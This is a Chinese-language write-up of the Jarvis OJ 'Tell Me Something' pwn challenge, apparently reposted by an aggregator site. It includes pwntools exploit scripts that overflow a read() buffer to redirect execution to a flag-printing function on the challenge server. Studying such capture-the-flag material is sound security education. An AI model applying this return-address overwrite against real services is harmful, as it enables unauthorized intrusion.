[Jarvis OJ - PWN]——Tell Me Something

• 題目地址：https://www.jarvisoj.com/challenges
• 題目：
  
  還是先checksec一下,64位開啟了NX保護
  
  IDA:看看，發現了可以利用的棧溢出函數read，第一個參數為0。代表標準讀入，距離ebp的距離為0x88
  
  找到可以打印flag的函數good_game和地址。可以作為覆蓋的返回地址0x400620
  所以expolit為

from pwn import * p = remote("pwn.jarvisoj.com",9876) ret = 0x00400620 payload = 'a'*（0x88 + 0x8) + p64(ret) p.sendline(payload) p.recvline() p.interactive()

可是沒想到不可以竟然失敗了。仔細看了下發現v4沒有ebp。什么鬼，孩子還是第一次碰到！！！不過以后可以長長記性了。

所以expolit為

from pwn import * p = remote("pwn.jarvisoj.com",9876) ret = 0x00400620 payload = 'a'*0x88+ p64(ret) p.sendline(payload) p.recvline() p.interactive()

如果有幫助，可以支持一下孩子哦 😃

總結

以上是生活随笔為你收集整理的[Jarvis OJ - PWN]——Tell Me Something的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。